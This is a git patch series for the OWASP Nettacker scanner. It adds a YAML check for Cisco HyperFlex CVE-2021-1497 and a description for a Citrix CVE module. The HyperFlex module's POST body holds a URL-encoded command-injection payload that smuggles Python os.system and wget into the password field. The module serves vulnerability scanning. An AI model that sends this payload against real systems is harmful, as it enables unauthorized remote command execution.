From 653f95dc8ae54076e07b959081d1335070d58736 Mon Sep 17 00:00:00 2001
From: Ehsan Nezami <ehsan.empire1@gmail.com>
Date: Sat, 2 Oct 2021 18:41:21 +0400
Subject: [PATCH 1/2] add new module cisco hyperflex

cve 2021 1497
---
 .../vuln/cisco_hyperflex _cve_2021_1497.yaml  | 57 +++++++++++++++++++
 1 file changed, 57 insertions(+)
 create mode 100644 modules/vuln/cisco_hyperflex _cve_2021_1497.yaml

diff --git a/modules/vuln/cisco_hyperflex _cve_2021_1497.yaml b/modules/vuln/cisco_hyperflex _cve_2021_1497.yaml
new file mode 100644
index 000000000..a1fb1bcd7
--- /dev/null
+++ b/modules/vuln/cisco_hyperflex _cve_2021_1497.yaml	
@@ -0,0 +1,57 @@
+info:
+  name: cisco_hyperflex_cve_2021_1497_vuln
+  author: OWASP Nettacker Team
+  severity: 9.8
+  description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-1497
+    - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html
+  profiles:
+    - vuln
+    - vulnerability
+    - http
+    - high_severity
+    - cve
+    - hyperflex
+    - cisco
+
+payloads:
+  - library: http
+    verify: false
+    timeout: 10
+    cert: ""
+    stream: false
+    proxies: ""
+    steps:
+      - method: post
+        headers:
+          Accept: "*/*"
+          Content-Type: application/x-www-form-urlencoded
+          User-Agent: "{user_agent}"
+        allow_redirects: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              paths:
+                - 'auth/change'
+                - 'auth'
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+        data: username=root&password=123%5C%22%2C%5C%22%246%24%24%5C%22%29%29%3Bimport%20os%3Bos.system%28%5C%22wget%20http%3A%2F%2F%7B%7B{target}%7D%7D%5C%22%29%3Bprint%28crypt.crypt%28%5C%22
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "http"
+              reverse: false

From eb3f19bbf56bf9397d36b24aab34629070081b39 Mon Sep 17 00:00:00 2001
From: Ehsan Nezami <ehsan.empire1@gmail.com>
Date: Sat, 2 Oct 2021 18:45:34 +0400
Subject: [PATCH 2/2] add description and ref cve 2019 19781

---
 modules/vuln/citrix_cve_2019_19781.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/vuln/citrix_cve_2019_19781.yaml b/modules/vuln/citrix_cve_2019_19781.yaml
index 27dd32457..ab9884302 100644
--- a/modules/vuln/citrix_cve_2019_19781.yaml
+++ b/modules/vuln/citrix_cve_2019_19781.yaml
@@ -2,8 +2,9 @@ info:
   name: citrix_cve_2019_19781_vuln
   author: OWASP Nettacker Team
   severity: 8
-  description:
-  reference:
+  description: CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance
+  reference: 
+    - https://support.citrix.com/article/CTX267027
   profiles:
     - vuln
     - vulnerability